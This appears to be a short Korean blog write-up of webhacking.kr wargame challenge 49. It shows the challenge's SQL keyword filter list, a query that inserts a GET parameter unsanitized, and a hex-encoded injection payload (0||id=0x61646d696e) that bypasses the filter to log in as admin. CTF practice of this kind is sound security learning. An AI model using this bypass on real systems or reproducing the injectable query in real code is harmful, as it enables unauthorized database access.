필터링 목록
select | or | and | ( | ) | limit | , | / | order | cash | 공백 | \t | ' | "
쿼리문
select id from chall49 where lv={$_GET['lv']}
쿼리를 보내 id가 admin이면 클리어
46번과 비슷한데 이번에는
괄호를 아예 못 쓰게 해놔서 함수를 못 쓸것 같음
그래도 0x를 필터링 해놓지 않아서 문자로 바꿀수 있음
0||id<0x62를 했을 때
연막 쳐놓은거 같음
바로
0||id=0x61646d696e를 보낸다
0x61646d696e(admin)
'Wargame, CTF > webhacking.kr' 카테고리의 다른 글
| Webhacking.kr 53번 (0) | 2019.12.13 |
|---|---|
| Webhacking.kr 35번 (0) | 2019.12.11 |
| Webhacking.kr 46번 (0) | 2019.12.09 |
| Webhacking.kr 32번 (0) | 2019.12.06 |
| Webhacking.kr 26번 (0) | 2019.12.06 |
